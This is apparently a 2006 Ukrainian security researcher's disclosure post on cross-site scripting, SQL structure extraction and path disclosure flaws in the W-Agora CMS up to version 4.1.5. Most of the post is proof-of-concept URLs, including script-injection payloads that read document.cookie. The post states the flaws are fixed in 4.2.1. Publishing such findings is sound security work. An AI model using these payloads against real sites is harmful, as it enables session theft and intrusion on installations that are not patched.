XSS, SQL DB Structure Extraction та FPD в W-Agora
17:31 20.12.200628.11.2006
Нещодавно, 22.11.2006, мною були знайдені Cross-Site Scripting, SQL DB Structure Extraction та Full path disclosure уразливості в W-Agora. І знайшов їх коли натрапив на уразливості на maidan.org.ua.
W-Agora - це система веб публікації (web publishing and forum software), тобто по суті CMS. Уразлива версії системи W-Agora 4.1.5 та попередні версії.
Всього я знайшов 7 XSS, одну SQL DB Structure Extraction та одну Full path disclosure уразливість. Найближчим часом повідомлю розробникам W-Agora.
20.12.2006
Уразливості в скрипті search.php3.
XSS:
http://site/news/search.php3?site=x&bn=y_news&gosearch=1&sf=1&pattern=%3Cscript%3Ealert(document.cookie)%3C/script%3E
SQL DB Structure Extraction:
http://site/news/search.php3?site=x&bn=y_news&gosearch=1&sf=1&pattern=xxxxxxxxxx
Уразливості в скрипті list.php.
XSS:
http://site/static/list.php?key=%3Cscript%3Ealert(document.cookie)%3C/script%3E
Full path disclosure:
http://site/static/list.php?key=-1102352364
Уразливості в скрипті login.php3.
XSS:
http://site/news/login.php3?site=x&bn=y_news&loginform=1&loginuser=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/news/login.php3?site=x&bn=y_news&loginform=1&loginpassword=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/news/login.php3?site=x&bn=y_news&loginform=1&redirect_url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/news/login.php3?site=x&bn=y_news&loginform=1&editsite=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
http://site/news/login.php3?site=x&bn=y_news&loginform=1&userid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Як було зазначено, уразливості відносяться до W-Agora 4.1.5 та попередніх версій. І як повідомив мені розробник системи W-Agora, всі вищезгадані уразливості вже виправлені в самій останній версії - 4.2.1. Котра вже вийшла і всі користувачі системи можуть оновити її движок до останньої версії.
